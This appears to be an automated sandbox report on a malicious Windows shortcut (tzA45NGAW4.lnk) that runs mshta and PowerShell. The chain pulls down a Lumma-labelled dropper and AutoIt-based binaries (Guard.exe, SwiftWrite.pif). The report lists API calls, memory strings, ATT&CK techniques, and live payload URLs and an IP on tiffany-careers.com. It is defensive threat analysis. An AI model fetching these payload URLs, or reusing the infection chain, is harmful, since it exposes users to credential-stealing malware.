Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A5202BA0 GetLocalTime,

15_2_00007FF7A5202BA0

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A5202BCF GetUserNameW,

15_2_00007FF7A5202BCF

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A51E2650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

15_2_00007FF7A51E2650

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe

Code function: 15_2_00007FF7A51C1D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,

15_2_00007FF7A51C1D80

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Source: powershell.exe, 00000015.00000002.1752565815.00000234E4EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 00000017.00000002.2628751890.0000000001238000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: Guard.exe, 00000017.00000002.2628496895.0000000000B90000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: C:\Windows\system32\C:\Users\Public\Guard.exe"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 C:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1752565815.00000234E4EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1998499953.00000234FCFC7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1998499953.00000234FCFB7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1998499953.00000234FCF60000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1709692301.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1716072878.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1700536036.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1709294909.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1695458455.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1710668030.0000000004C10000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1716184325.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000003.1709923157.0000000004C10000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Guard.exe
Source: powershell.exe, 00000015.00000002.1747133633.00000234E2E54000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 2C:\Users\Public\Guard.exe
Source: Guard.exe, 00000017.00000002.2630002754.000000000376A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: pC:\Users\Public\Guard.exe
Source: qJXhXwR.exe, 0000000F.00000002.1641570174.000002009EE89000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1998499953.00000234FCFC7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1998499953.00000234FCF12000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E4CE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2030506548.00000234FD0EB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1998499953.00000234FCF60000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1747133633.00000234E2E54000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E4EE1000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, Guard.exe, 00000017.00000002.2628547296.00000000011CF000.00000004.00000010.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2628547296.00000000011BF000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000015.00000002.1752565815.00000234E4EE1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \Users\Public\Guard.exe

Source: SwiftWrite.pif	Binary or memory string: WIN_81
Source: SwiftWrite.pif	Binary or memory string: WIN_XP
Source: SwiftWrite.pif	Binary or memory string: WIN_XPe
Source: SwiftWrite.pif	Binary or memory string: WIN_VISTA
Source: qJXhXwR.exe, 0000000F.00000000.1554853365.00007FF7A5278000.00000002.00000001.01000000.0000000F.sdmp	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pif	Binary or memory string: WIN_7
Source: SwiftWrite.pif	Binary or memory string: WIN_8
Source: SwiftWrite.pif.23.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A5234074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	15_2_00007FF7A5234074
Source: C:\Users\user\AppData\Roaming\qJXhXwR.exe	Code function: 15_2_00007FF7A5233940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,	15_2_00007FF7A5233940
Source: C:\Users\Public\Guard.exe	Code function: 23_2_0096696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	23_2_0096696E
Source: C:\Users\Public\Guard.exe	Code function: 23_2_00966E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	23_2_00966E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001A696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	27_2_001A696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	Code function: 27_2_001A6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	27_2_001A6E32

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	21 Windows Management Instrumentation	1 Scripting	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Email Collection	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	2 Valid Accounts	2 Valid Accounts	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	3 PowerShell	2 Registry Run Keys / Startup Folder	21 Access Token Manipulation	1 Timestomp	NTDS	38 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	12 Process Injection	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	231 Masquerading	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Valid Accounts	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Access Token Manipulation	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	12 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
tzA45NGAW4.lnk	26%	Virustotal		Browse
tzA45NGAW4.lnk	18%	ReversingLabs	Shortcut.Trojan.Pantera

Dropped Files

Source	Detection	Scanner	Label
C:\Users\Public\Guard.exe	8%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\Ghep2712[1]	8%	ReversingLabs	Win32.Dropper.Lumma
C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif	8%	ReversingLabs
C:\Users\user\AppData\Roaming\qJXhXwR.exe	35%	ReversingLabs	Win64.Downloader.Generic

Source	Detection	Scanner	Label
https://tiffany-careers.com/Project_Information.pdf	0%	Avira URL Cloud	safe
https://tiffany-careers.com/2	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712N	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712E	0%	Avira URL Cloud	safe
https://tiffany-careers.com/qJ	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712$global:?	0%	Avira URL Cloud	safe
https://tiffany-careers.com	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712PPC:	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712Vz	0%	Avira URL Cloud	safe
https://tiffany-careers.com/tlUmNmGG.txt	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712G	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712H	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712C:	0%	Avira URL Cloud	safe
https://tiffany-careers.com/qJX	0%	Avira URL Cloud	safe
https://tiffany-careers.com/qJXhX	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712p	0%	Avira URL Cloud	safe
https://tiffany-careers.com/qJXhXwR.ex	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712ent	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712x	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712...	100%	Avira URL Cloud	malware
https://tiffany-careers.com/qJXhXwR.	0%	Avira URL Cloud	safe
https://tiffany-careers.com/qJXhXw	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712_	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712rnationali	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712l	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712userLOCALAPPpy	0%	Avira URL Cloud	safe
https://tiffany-careers.com/q	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712CPL	0%	Avira URL Cloud	safe
https://tiffany-careers.c	0%	Avira URL Cloud	safe
https://tiffany-careers.com/kSMAbiand	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712https://tiffany-careers.com/Ghep2712	0%	Avira URL Cloud	safe
https://tiffany-careers.com/qJXhXwR	0%	Avira URL Cloud	safe
https://tiffany-careers.com/qJXh	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712:asLMEMP	0%	Avira URL Cloud	safe
https://tiffany-careers.co	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712	100%	Avira URL Cloud	malware
http://tiffany-careers.com	0%	Avira URL Cloud	safe
https://tiffany-careers.com/qJXhXwR.exe	0%	Avira URL Cloud	safe
https://tiffany-careers.com/qJXhXwR.e	0%	Avira URL Cloud	safe
https://tiffany-careers.com/Ghep2712&	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
tiffany-careers.com	147.45.49.155	true	false	high
x1.i.lencr.org	unknown	unknown	false	high
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://tiffany-careers.com/Project_Information.pdf	true	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/tlUmNmGG.txt	true	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/kSMAbiand	true	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/Ghep2712	true	Avira URL Cloud: malware	unknown
https://tiffany-careers.com/qJXhXwR.exe	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://tiffany-careers.com/2	mshta.exe, 00000006.00000002.1734217919.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1727135486.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/Ghep2712N	mshta.exe, 00000006.00000002.1734217919.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1727135486.000001CA44DF7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1579963511.000001FB582FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E4CE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.1752565815.00000234E5C2B000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://crl.microsoft	powershell.exe, 00000009.00000002.1712339725.000001FB70300000.00000004.00000020.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000015.00000002.1752565815.00000234E63C2000.00000004.00000800.00020000.00000000.sdmp	false		high
https://tiffany-careers.com/Ghep2712$global:?	powershell.exe	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/Ghep2712PPC:	mshta.exe, 00000006.00000002.1734179559.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732782956.000001CA44DA8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/Ghep2712E	mshta.exe, 00000006.00000002.1734112059.000001CA44D80000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/qJ	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/Ghep2712Vz	powershell.exe, 00000005.00000002.1412141272.000002C8BB632000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.autoitscript.com/autoit3/	Guard.exe, 00000017.00000003.1715203306.0000000004CE0000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000017.00000002.2633323030.0000000003EFA000.00000004.00000020.00020000.00000000.sdmp, SwiftWrite.pif.23.dr	false		high
https://tiffany-careers.com/Ghep2712G	mshta.exe, 00000006.00000003.1727135486.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44DBD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1734217919.000001CA44DBE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/Ghep2712H	mshta.exe, 00000006.00000002.1734524084.000001CA46810000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/Ghep2712C:	powershell.exe, 00000005.00000002.1416759046.000002C8D58E2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1734112059.000001CA44D80000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1727135486.000001CA44E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732303015.000001CA44E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1732823139.000001CA44E5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000002.1734405681.000001CA44E5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000006.00000003.1723431987.000001CA44E42000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/qJX	powershell.exe, 00000009.00000002.1579963511.000001FB58BEB000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://tiffany-careers.com/Ghep2712p	powershell.exe, 00000005.00000002.1413336162.000002C8BD571000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
